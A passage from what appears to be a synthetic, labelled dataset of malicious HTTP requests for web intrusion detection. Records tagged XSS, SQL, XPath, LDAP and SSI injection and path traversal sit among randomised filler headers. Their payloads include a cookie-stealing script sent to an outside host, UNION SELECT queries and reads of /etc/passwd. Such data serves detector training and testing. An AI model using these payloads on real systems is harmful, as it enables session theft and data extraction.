Via: 7.2 45.215.107.150, 7.3 www.malxpn.png, HTTP/3.1 www.ohul.png:305
Transfer-Encoding: to2uw
Upgrade: botOA/6.4, hiei4a/3.6, u8Qat/8.0
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 254.23.68.104
X-Serial-Number: 706890452941318
----: -------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45213
Start - Id: 46661
class: XSS
GET /iDnmMdpWElZuU.htm?aenrdNior5f=hiaBm&lEmarc6t7n=287457 HTTP/1.0
Host: www.ItaoeniT.uk
Connection: eeOn
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: yuveUce-sk, eGOeh-r60g;q=0.6, h-ts;q=0.9, id-sbFn9ie;q=0.3, tfe-jNor
Cache-Control: min-fresh=824
Client-ip: 80.104.205.242
Cookie: 6SPK8ovntN=gEijstMHteea;F@2cscriptS5Arcp=&<script  >[document.location.replace ('http://www.nage.com/cgi-bin/seinle.cgi'+document.cookie);]</script >;N9gKLhbinqpI52=ezteidwR92tslrro;srrimer=d
Cookie2: $Version="294"
Date: Thu, 12 Jun 08 09:20:40 UTC
ETag: "J_RXykY97eVlK3@hO-3"
Expect: niet0idA=tgesrYs
From: yn4r7n2@oAtirnF.biz
If-Modified-Since: Thu, 10 Sep 09 22:19:50 UTC
If-Unmodified-Since: Sat, 10 Jan 09 09:43:16 UTC
If-Match: *
If-None-Match: "xyXHh24KpoeNaLyEX"
If-Range: *
Max-Forwards: 252
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Gwh7 oehnsd=LeflJer
Authorization: sslavT a5ErOh3=aken
Range: 403830-16,093-
Referer: /oom8.cfm
TE: deflate;q=0.8
Trailer: If-Modified-Since
User-Agent: Mozilla/5.8 (Windows; U; Win98 2.3; Io-6T; rv:0.2.9) Gecko/14410276
UA-CPU: PowerPC
UA-OS: WinNT
UA-Color: color16
Via: ysj/5.7 79.31.52.228, nst/7.2 113.2.89.28, FTP/5.7 182.235.18.242:59392
Transfer-Encoding: E9fI
Upgrade: 0hi/0.1, sdpair/3.6
Warning: 212 www.ee2Ee.js "iuaewa4tc" 
X-Forwarded-For: 216.174.136.108
X-Serial-Number: 64753281
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46661
Start - Id: 49052
class: XPathInjection
GET /hiun9rZhSqrrni6/Adels/tM6azRinepr3rtog/lRZuGH/sOkx2T2bvVAna/haunoiiuhraopaliv/oogNsrsfh0viarbnI/aLG.mspx?xDA5nrAJ=odiiioaotNdirgsi&QAVGU7@Cnulll=uEht%27+++++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or+++%27eddSn%27%3D%27&iRsY=Waieqneeo&o0lsEd4ss=vpRK1aVRUu&omrqni1=tYP97G0dn&wnnrcwhiaovqnts=37&csA=yriIp&.XvarrE5sNq=ylog35 HTTP/1.0
Host: www.Dwr0u8.ch
Connection: xtNow0
Accept: image/*;q=0.8, video/*, video/*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: bpvF-rsi, t2ty-oTEsr, ove1otit-qae, eef-9nl, doitff-eb7hea01
Cache-Control: no-transform
Client-ip: 20.81.251.104
Cookie: taso42=nN<|D ceed ;Cuc7vBszTn=sFNzw;tnu=6;ktmtshe=r6XikCxKvh;1aednajoEwtpc=nnulla+imgeBlrmsribtsN
Cookie2: $Version="8"
Date: Tue, 20 Jan 04 06:35:23 UTC
ETag: "Yf@q6Cv-kVW2Zxi"
Expect: oEz1em=waeor
From: thhe@eis9.be
If-Modified-Since: Tue, 09 May 06 01:35:42 CET
If-Unmodified-Since: Fri, 01 Aug 08 19:14:08 CET
If-Match: "P6A0asgm1IGG2IAzMdzO"
If-None-Match: *
If-Range: *
Max-Forwards: 072
MIME-Version: 6.2
Pragma: ah3wxcv='Ifsiezto'
Proxy-Authorization: Basic cjhhZTp0b2h1bkll
Authorization: Basic Nmd2aDpOZm54aW4=
Range: 2359-0,-77
Referer: /tii7esm.sh
TE: chunked;q=0.9,gzip;q=0.7
Trailer: Referer
User-Agent: egaest7t/1.3.1
UA-CPU: x86
UA-Disp: 357,241,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 003x367
Via: reO26e/0.4 www.ettfTn.jpeg, FTP/3.0 www.bntsoe.gif
Transfer-Encoding: identity
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 712 141.86.56.222 "RenNkwhed" "Fri, 05 Oct 07 19:54:02 GMT"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49052
Start - Id: 49390
class: XPathInjection
GET /brottb/o2aujrsaimthf3nUh/eKBZAKA07Ashe-v9bt/INPNXR/hh_5Mmj/dlnOi/xUO_z.f.-/e57PCh3-bRPCibwBM_mJ/heveiroVqehtRe/ffXy2HsKtl/7f/aDJDGRJXAreplace0CoF.dll?dtmpfromOdj4YEiIQ=dyazd%27++++or++1%3C+ete%2FmhNiRh%2FlrontM%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D5%5D++++or+%27trnbl%27+%3D+++%27&ratu1=hHdEej3+%26uD&YrmiC1HW2O=0%2F6u+tlsdsb HTTP/1.1
Host: www.yj5eih.ch
Connection: keep-alive
Accept: text/xml;q=0.2, image/gif;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: identity, gzip
Accept-Language: ldc6ef-iduea, H8-dhPreesk, s-y, g-G, eiie-nIoee53a
Cache-Control: no-cache
Client-ip: 232.182.22.65
Cookie: aylxyMNlE=ehurugc
Cookie2: $Version="1"
Date: Wed, 12 Nov 08 02:43:40 CET
ETag: W/"2TMjTj3nMjRhbDH037L"
Expect: Mt3seamr
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Fri, 24 Aug 07 15:53:04 UTC
If-Unmodified-Since: Thu, 06 Sep 07 05:40:42 UTC
If-Match: "M3fb-4h4@iIofJKS_dD"
If-None-Match: "D@ujWRWMXaAHoPFg"
If-Range: *
Max-Forwards: 2477
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: Basic MlI4dnNlOnRueU9qbw==
Range: -33311,24-
Referer: http://www.hhurlsok.st/bcmeB.asp
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Range
User-Agent: Mozilla/1.8 (Machintosh; U; PPC Mac OS X 9.3; 9a-gr; rv:3.1.3) Gecko/56563486
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0695x2392
Via: HTTP/3.8 88.191.115.14, FTP/2.6 221.244.170.230, rZj/2.1 www.w4ece0h.shtml
Transfer-Encoding: gzip
Upgrade: goiteB/8.3
Warning: 873 179.220.247.176 "a53nepbizi" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 9327975536472
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49390
Start - Id: 46402
class: PathTransversal
GET /91vJQbg5FSRuUcUqXhu/zr/tpassthru/d6YiC2LpqJZGrWIhQ97g/o1/nPQZDSVkdKY5G/i5cPjSlst/f5oAZfpYl4_/wiD_jUI/vtpwei8samejn/wdfrmthst.mspx?autvolte=254578&sock_stream1IwQxp_b=jadO&tsad4etteror=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&erextje=nuerA HTTP/1.1
Host: www.ncts.be:1
Connection: 4mihe
Accept: */*
Accept-Charset: iso-8859-9
Accept-Encoding: deflate, identity, deflate;q=0.1, gzip;q=0.2
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 43.64.25.189
Cookie: chefhUed=Ehs>5ui=net -sdachild6da;EuG=rlocationeN;eMXaso8lonq6sn=thrlah];OL;mEmawoN=zecoli;t
Cookie2: $Version="4"
Date: Tue, 25 Dec 07 03:01:52 UTC
ETag: W/"AuAN-mgN8NIK-@ZSw.r"
Expect: 100-continue
From: eitn@airwo.uk
If-Modified-Since: Sat, 19 Dec 09 07:15:53 GMT
If-Unmodified-Since: Sun, 07 Aug 05 06:16:05 UTC
If-Match: "jnL_ddsF5ggrN6p"
If-None-Match: "iysPBxTwY.87qTgwl.."
If-Range: *
Max-Forwards: 249
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: NTLM ZWNyc2hIMWpkY250bnRmaGVlaFNiZTJmb2llZGRuMWU0
Range: 0-,-1441,-234089
Referer: /sthd49.tar
TE: gzip;q=0.2
Trailer: TE
User-Agent: ttX4aaauu (s-u-8kP4Fa; wULj4w5.r; oNs-0w; eoZm@RAp; ej1jj3-)
UA-CPU: MIPS
UA-Disp: 9745,801,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 999x039
Via: 7.0 251.86.133.152, 8.0 www.hAee.tiff:908
Transfer-Encoding: compress
Upgrade: nri/5.0, rree/0.5, msno/4.0
Warning: 070 www.eidmeFjN.shtml "nisl" 
X-Forwarded-For: 141.149.156.77
X-Serial-Number: 22445
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46402
Start - Id: 35256
class: SqlInjection
GET /apnrieiHrDn5ofuis.cgi?oto8arrd=5649741&tcetha=%27++++%29+UNION+ALL+SELECT+++++6747+FROM++++ox+++++WHERE++++%28++++%27%27++%3D+%27 HTTP/1.0
Host: 6.250.186.131
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek, windows-1254, windows-1250, x-mac-chinesetrad;q=0.5
Accept-Encoding: compress, deflate;q=0.9, compress
Accept-Language: oumiDhx-z
Cache-Control: only-if-cached
Client-ip: 149.160.7.148
Cookie: mE=gGBo;yami3h6ed1hH=rad;tgdee=b1GGs;xZQD= :anO-8z
Cookie2: $Version="4"
Date: Sun, 29 Jun 08 11:02:57 GMT
ETag: W/"NBtBFUHwyb@U6oz"
Expect: er37ac=rtaefe;celo
From: ieogO97c@1xtO.uk
If-Modified-Since: Mon, 26 Jun 06 06:10:40 GMT
If-Unmodified-Since: Sat, 30 Jul 05 24:48:03 GMT
If-Match: *
If-None-Match: "qKF1tnUslmLC7f6ZqhF"
If-Range: Sun, 29 Jun 08 15:57:08 CET
Max-Forwards: 77
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: 8eEcs dejCatel=tunerro
Authorization: NTLM dGVjYW9lM2FJZnRjYWhzZWVwaTNyZWdkZDR5YVR0NmFkaXI0b2JPc3NJYTI2bjF1
Range: 275-
Referer: http://www.ttd5.ch/oibas/2dyi/eNye9we/0lch/pbdb.gif
TE: trailers,trailers,deflate;q=0.7
Trailer: User-Agent
User-Agent: V4eG (a-5UDH; l2GUCwwj-)
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7179x0700
Via: 2.8 165.220.150.159, 4.4 www.nnkm1.jpeg
Transfer-Encoding: deflate
Upgrade: I8j/1.5, gc9ecr/7.1
Warning: 690 www.lipntex.shtml "aeisgIo7eETipoewea" 
X-Forwarded-For: 242.188.252.188
X-Serial-Number: 3908709
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35256
Start - Id: 41234
class: SqlInjection
GET /6tqx8Zy94P_1GM-q/n4lcsa0ou1ihtc2tEkt/locationuP/natn6eeirwo4Rrzt/includeAPVNOT1idQN.-D8/xlae54i/aIeOxuZsF65/eu4w/eoeeeeRnetstaf/59X@@wV2/e.dI2J@ImTg-CebxH-Jy.mdb?3eftialm3rtrN=2aAWnrtI&TmiAethunfo=70535016&jcpk4naemo=ie1a7s0usrnr&9tnosaakvk=g%25o%7En HTTP/1.0
Host: www.a0x7gr9rL.cz
Connection: z4fea
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: ')   UNION   ALL SELECT   'tu',948,4690,'pieemd',5    FROM  amcetc3h WHERE   (  ''    = '
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 60.161.90.58
Cookie: Ths2srZegbi3=ht;yauiswntfil=a-LJ3DzA2l;afLqan1=bRWH8VYm;o6WynI_0x@M=ldseseataf9ow
Cookie2: $Version="58"
Date: Thu, 24 Jan 08 01:00:03 UTC
ETag: "sP9lLk.Gd8j3895J"
Expect: 100-continue
From: hsk6aaig@oo1it1ta.gov
If-Modified-Since: Sat, 08 Aug 09 10:28:12 UTC
If-Unmodified-Since: Wed, 05 Oct 05 18:10:50 CET
If-Match: "1WgZ.-61HqtgfGtHEKDq"
If-None-Match: "gCczCfUDT7uM.mtNH."
If-Range: Tue, 18 Nov 08 03:55:32 UTC
Max-Forwards: 3
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="onebmeen"
Authorization: NTLM ZW0ydGV1ZGVtZlJ2YWNhaWJ4OWluYTlFZWRzeGZ5NUxlZXBvdHJh
Range: 710465-
Referer: http://www.slavuhi.cz/atse.jsp
TE: chunked,deflate
Trailer: Accept-Encoding
User-Agent: xm3unwe
UA-CPU: MIPS
UA-Disp: 940,2353,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8507x042
Via: 0.8 102.77.184.105, 8htsi/5.2 www.ohvlt.css:2976, FTP/6.9 171.67.230.48
Transfer-Encoding: gzip
Upgrade: isseep/7.6
X-Forwarded-For: 53.10.114.237
X-Serial-Number: 2131870805423
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41234
Start - Id: 45874
class: PathTransversal
GET /KrLzdahRY/szhoode7ecrltidn/hDoIgNbBkr@.MzeC274/a-Imw1k71.shtml?RrLupdatescPS1=Pu%3Ao-obtlrgse4%3Fg&ootonyelzoesf=scriptncopyephpnitavh&as=%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: 15.21.152.17
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese, euc-tw;q=0.7, x-mac-greek;q=0.4, windows-1257;q=0.8, koi8-r
Accept-Encoding: deflate;q=0.5, identity, deflate;q=0.1, deflate;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 251.11.69.130
Cookie: asikot5=8858432;dreveasTtnin5z6=sstoee+rldgpdy-ipea;a8nesm2hWtt=36154640
Cookie2: $Version="18"
Date: Wed, 20 Apr 05 13:36:09 CET
ETag: "NZR.pyFHpDj5.Hgrtt6w"
Expect: 100-continue
From: 5roeHeR9@nsl4pe.de
If-Modified-Since: Sat, 01 Jul 06 13:42:04 GMT
If-Unmodified-Since: Tue, 17 Apr 07 03:27:09 CET
If-Match: *
If-None-Match: *
If-Range: "2oL1BrrKhANnmULkAM"
Max-Forwards: 3
MIME-Version: 7.2
Pragma: dphomlYI=tI
Proxy-Authorization: ha2n eocndmf=oIeb
Authorization: dsteL 9EurCSnS=ceaotr
Range: 81947-,357703-
Referer: /iss3.aspx
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: teqYGZrB http://www.nweAcou.be
UA-CPU: StrongARM
UA-Disp: 239,737,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0549x672
Via: 5.4 60.220.188.218:8841, FTP/1.4 www.Ohns.jpg, 8.0 174.55.231.78:8447
Transfer-Encoding: deflate
Upgrade: nrw/4.6, rEisa/4.6
Warning: 742 165.170.93.206 "swnoxaS" 
X-Forwarded-For: 150.61.102.195
X-Serial-Number: 9205115584869
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45874
Start - Id: 40786
class: SSI
GET /5n6sXz4gylk/iMO/Io/iJDVVDy3.R1qaif.jsp?ronuaha=582&trsyitB9foh=liehsrsiadaap&e9lhstenwN9=%3C%21--+%23odbc+++++connect%3D%225jxub%2Ceciit%2CrraI%22+++++++++statement%3D%22select+*+++++from++ol%22--%3E&atentoyeteTi2h=787495&RunionrVFcBY=ot&logJZDLR0EchildVQb=ovAWP HTTP/1.0
Host: 195.39.44.240:80
Connection: Tehahtn
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: j-pe5snyv;q=0.4, dianEh-e, edsniAe-este
Cache-Control: no-store
Client-ip: 79.174.208.245
Cookie: oo=yA';ho=tH ;7rQMV5JHlikeHn=D2mtN
Cookie2: $Version="646"
Date: Tue, 18 Sep 07 14:28:36 GMT
ETag: "vhdrjN37uTj.hbcz4l7"
Expect: 100-continue
From: tram87O@4tnG.de
If-Modified-Since: Sat, 22 Jul 06 07:24:31 CET
If-Unmodified-Since: Sun, 10 May 09 11:20:27 UTC
If-Match: "sahI6kg4qIt08lNMM"
If-None-Match: *
If-Range: Fri, 21 Oct 05 21:45:11 UTC
Max-Forwards: 1034
Pragma: xufmene='eHNan'
Proxy-Authorization: Basic bmVoc2o6bDlxb2FsdA==
Authorization: Digest algorithm=MD5
Range: 6294-616374
Referer: /qel1/hsia/ivicnytn.mp3
TE: trailers,gzip
Trailer: Trailer
User-Agent: Mozilla/4.8 (Windows; U; WinNT 5.2; vy-se; rv:4.7.1) Gecko/18252061
UA-OS: Win98
UA-Pixels: 4833x5333
Via: FTP/9.1 www.Ilrsrsti.tiff, amn/6.1 www.neenrna6.htm
Transfer-Encoding: hro7iu
Upgrade: itsch6/1.6
Warning: 512 www.zgaaa4Nn.html "tnlssOrNs" 
X-Serial-Number: 095022921
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40786
Start - Id: 40835
class: SSI
GET /aPainputOrcopySIT/o_/smk1SR0mR7tG@Kl8SY/owrrtiOhttu3sdtI/aI@/hA/tcH91-Dn/hrL0uvoeeeodeah/mQ_qUBWw4Cu@p/hskW0G7x7xBhpcbv3-/3@.asmx?9o88mwp-D6aHi_=%3C%21--++++%23odbc+++statement++++%3D%22select+nsrtd%2C++++sq%2C+++++7evtr1em++from+eBtl+++order+++++by+++7%2C++++77%2C+++++3%22++--%3E&IQFpassthrunhtpassupdate.9nnW=sock_streamtddgpeytbsl+txnullsssamT HTTP/1.0
Host: www.rOnbdsd.st
Connection: keep-alive
Accept: audio/*;q=0.0, application/zip
Accept-Charset: us-ascii;q=0.7, x-mac-turkish, utf-8, x-mac-greek;q=0.6
Accept-Encoding: identity;q=0.1, deflate, identity;q=0.4
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 246.243.47.248
Cookie: 933ootIwmWieyi=cS-1DqJ;dti=4171181
Cookie2: $Version="353"
Date: Sat, 23 Apr 05 13:27:30 UTC
ETag: W/"@ygQvx5XKQ4FDOQ2"
Expect: 100-continue
From: heeo2q@daRia.de
If-Modified-Since: Wed, 26 Sep 07 05:29:03 UTC
If-Unmodified-Since: Fri, 13 Feb 09 14:30:37 CET
If-Match: *
If-None-Match: "J_Cz5lDOCxj4AEqV"
If-Range: Wed, 05 Oct 05 18:01:45 CET
Max-Forwards: 09
MIME-Version: 0.3
Pragma: luTs=lmlfm
Proxy-Authorization: Basic MWFhVG1EOnNsZW9l
Authorization: e0eBS a5ehet=sHytrnw
Range: 4-703669
Referer: /O4hozul/ef0w3erH/isha/osiRs.pdf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.2 (Machintosh; U; PPC 5.8; si-l1; rv:8.4.0) Gecko/69779713
UA-CPU: PowerPC
UA-Disp: 7808,940,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7606x249
Via: FTP/2.2 164.251.101.92, HTTP/3.4 246.153.35.173, FTP/0.5 www.edattOt.png
Transfer-Encoding: gzip
Upgrade: aBsae/7.5, Ars/0.8, 2ba7f/1.4, ikeqi/5.4
Warning: 943 www.nneettw.tiff "el9tus" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 546087958111322
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40835
Start - Id: 37799
class: LdapInjection
GET /ak8/childsWP6.3-jOu/lNFkVy.nsf?mtnEsaTipL75eja=location70erfde3oaeavbscripthomeecc%25q&tsar=71%29%28%26%28objectClass%3Dbi6e%29%28%7C%28sn+%3D++nt%29%28cn%3Di8rp+++++J*%29%29&lm=h9cKmM HTTP/1.0
Host: www.Iauathw.ch:516
Connection: keep-alive
Accept: application/*;q=0.1, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=5454
Client-ip: 88.4.33.9
Cookie: ClZCd-il6R=lf;d0=724;uxm2ivi=>samps[ ;KconnectgI=Oftprzn;o7eon=276407136;meniesaxr=l
Cookie2: $Version="7"
Date: Wed, 04 Jul 07 18:45:25 CET
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: 100-continue
From: eiuLl1hr@buwsjfa.cz
If-Modified-Since: Sat, 15 Apr 06 15:08:10 CET
If-Unmodified-Since: Fri, 23 Apr 04 21:15:39 CET
If-Match: *
If-None-Match: "Zcce8fjmgI08heW"
If-Range: Sat, 19 Nov 05 09:15:53 GMT
Max-Forwards: 1198
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM bXNiYWhpN29ubThuZXJheThvdXNzU0FhZXNhRFdncmx5MG5hZHpubzZyZTA=
Authorization: Digest nc=bC8DDEDe
Range: -1,56487-
Referer: http://www.fcsfhor.cz/7q8oduet/morR/mIenpk/qh6aep/neioensa.mpeg
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/0.1 (X11; U; Solaris 9.1; 4k-ye; rv:4.2.8) Gecko/02489504
UA-CPU: x86
UA-Disp: 654,6999,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 3.6 130.129.196.38, 0.5 230.229.180.179, FTP/1.4 www.toes.css
Transfer-Encoding: deflate
Upgrade: rasu/0.8, teies/0.4, nSn4/5.5, rceyaa/2.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 51540025219516295727
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37799
Start - Id: 38204
class: LdapInjection
GET /T0Nbelt8i5smbini2/yms95p7hvz6QedHK/s1/p6@cM/eHUbs/0xHvdR8CyF./t@Jd@GVZwDyu/eczQtg2IL5H/eqbWxU/dL.vuznull7f/tO7NvYAqKdB4L.ywZ5.css?edcahoriaiv=ewelssOrb%25e2p&yirasonns=wp-eeClsesn%2B&EmlEc9dlcsa3wem=dh7window.openoaQtk&ycrlyuc=6ts8&ridbeetel4zoop=obaoa6e5u7e&senenr=hcselectnphpxn&-.vbscriptA=%29%28++%7C+%28displayName%3Dhad*%29++++%28name++%3D+++had*++++%29%28mail%3Dhad*++%29&doweibas=4900903&k4r=5tts-llibu HTTP/1.1
Host: 237.130.231.50
Connection: keep-alive
Accept: application/*;q=0.0, audio/*, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: s6Aed-do, c1hoo-tOyaa, ar-sLdmM, czsbm-Tiwoeoei
Cache-Control: no-transform
Client-ip: 9.211.101.123
Cookie: ceBoniYt=9;EdtOdenbehwyil=p;SNmZteTtuse=>o?;IlsS=438918581;TXvB_q5ZKqGV=te
Cookie2: $Version="98"
Date: Thu, 24 Aug 06 19:18:45 CET
ETag: W/"K_UdcY8UF88HpDJdoTgY"
Expect: efooed
From: hnrpa@Dtsdlni.be
If-Modified-Since: Sat, 14 Feb 09 13:01:18 UTC
If-Unmodified-Since: Fri, 06 Jul 07 20:26:44 UTC
If-Match: "UbZneqKfi8XP9Ar6"
If-None-Match: *
If-Range: *
Max-Forwards: 67
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: tnEjr B7bt5=zaeTe
Authorization: Basic c3NzaWk6ZU5kZQ==
Range: 143609-2,-687,75-
Referer: http://bweaih.com/7ewh/dismbu4/NnaOur/7a8so/siulPi.wmn
TE: trailers
Trailer: Warning
User-Agent: Mozilla/0.7 (X11; U; Solaris 3.7; st-tz; rv:0.2.4) Gecko/94429369
UA-CPU: PowerPC
UA-Disp: 843,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 321x2267
Via: 8.1 123.177.211.141, 9.7 142.211.220.112:3, FTP/0.1 169.49.77.134
Transfer-Encoding: gzip
Upgrade: mrrUlT/4.8, 7edu/8.3
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38204
Start - Id: 48727
class: XPathInjection
GET /3OyQLt593.yweKICO/he/2c9awtitreethtd/trqa7Ethuoeg/oIoi8e34NtiyeEa8/thohDYVtp/B6fwjhGw3sL/s9SmoRcnell/IiA9binan/mJf_pe_fJlBgdrYKe4/ha1ddlL64t/H_DJSHxZvpPLP.exe?Ulnbsle=7&asp=nfusJxndsaef1t&nmni2kssogevNu=Nejop7e&noo7cbroeaw0osa=abf&hsrcts=8346&nnoecntiykhdx=homeuLjloinph-betweeno%3D&co2i=10&MsDa7=900&H6eneryoi=442175&Cnavuafutae=ajse%2Fos%2FyjmMla%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D3%5D++%7C++1enAny%2Ftnn2O%2Fsidc%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D61%5D+++++or+%27atGAes%27+%3D+++%27&reetond3e=s45nw HTTP/1.1
Host: 19.249.93.76
Connection: nMFhn8
Accept: */*
Accept-Charset: cp-932, gb2312;q=0.3, x-mac-arabic, x-mac-arabic, euc-tw;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 86.22.3.99
Cookie: oritote425h=9PK;izTtet=nml;copya >;@IJf7-_2ZMFE=ue;divE.N=ia3pnntn2qs;nua=Nve%h =G;sRtned=etle8m
Cookie2: $Version="515"
Date: Wed, 04 Mar 09 13:48:08 CET
ETag: W/"V8UTY.e7_JhVggpJl"
Expect: 100-continue
From: juant@i0E7vA.biz
If-Modified-Since: Mon, 14 Nov 05 21:56:38 UTC
If-Unmodified-Since: Fri, 09 Apr 10 21:44:52 UTC
If-Match: "fbFshIx.4Xyty4MQ"
If-None-Match: "zfo7oCFukF4XNIM4y"
If-Range: *
Max-Forwards: 606
Pragma: no-cache
Proxy-Authorization: NTLM dTZld210U2hpaWhzaFNhdHVyZWRvcmNlZnBxQTNydzJlc3RyYW1o
Authorization: Basic dGVFZTppa3U5aA==
Range: 7-577073
Referer: /r3dM.htm
TE: trailers
Trailer: Upgrade
User-Agent: jeINs/3.9.7.6
UA-CPU: Sparc
UA-Disp: 0723,340,16
UA-OS: Windows 98
UA-Pixels: 0339x4942
Via: HTTP/8.1 www.Tpce.tiff, 9.7 www.aShah.html, 5.8 202.238.250.241
Transfer-Encoding: gzip
Upgrade: jsys/9.9, esPjt/6.5, ns2dn/0.3, 7cR6zm/2.4
Warning: 042 95.15.3.29 "ettnnbeaTz7i" "Fri, 29 Apr 05 11:16:46 UTC"
X-Serial-Number: 3865979
----: ---------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48727
Start - Id: 36330
class: PathTransversal
GET /ps/rjdlohhS/ks5bodyZ8TcNdZz/pMSMHwn0Uv2Vmz/oD7WR8.zvb37siZa/hsPKxomYqMCQU/Xu/s7R3gihirot/iqXnq22b3MVB6MY_NO7/eGt3dnfv9vZiU..dll?pEqiilddlear=21590&hai=%2Fetc%2Fpasswd&gnhderHn3f8cspd=34&QLperlNMwgetvf_ziframeC=7&walcaeSqht=0np%3B%5Bm&8tEybxtsmhwRfe=4e1&aHyUsi6msA5nDee=v3GO&cteftje=swop9&0deoiaew0t=sZcSa_&iqovfblebSU=8846 HTTP/1.0
Host: www.qRbitt.it:80
Connection: oo6eior
Accept: */*
Accept-Charset: x-mac-arabic;q=0.8, cp-936, x-mac-cyrillic;q=0.3, windows-1258;q=0.6, cp-932;q=0.8
Accept-Encoding: identity;q=0.0, deflate, identity
Accept-Language: F7-nd0, 0-tn;q=0.6, a6hl-rutttn;q=0.5
Cache-Control: max-age=962
Client-ip: 179.242.140.245
Cookie: ioCKFhOPzx=tL3V-
Cookie2: $Version="430"
Date: Fri, 06 May 05 11:05:48 UTC
ETag: "YheWX8B.bpdlJCw5@ydv"
Expect: 100-continue
From: potfI@7waa4m.be
If-Modified-Since: Thu, 28 Feb 08 12:18:39 UTC
If-Unmodified-Since: Wed, 17 Dec 08 05:04:30 GMT
If-Match: *
If-None-Match: "V1g.c7tKpkD-c1bIlm7X"
If-Range: "9gHKbecVyHiF-0y.Y"
Max-Forwards: 4
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM dWVlN2U5Y2RoYmN0b2h0dGRlb21zbHRhMXQ4aG5zeW5yZWR0ZGJ0aA==
Range: 94941-674,-88804,1546-98301
Referer: /i2iuM/mola/kMit/UeNe.asp
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 9.9; nf-el; rv:2.5.4) Gecko/26978410
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 625x983
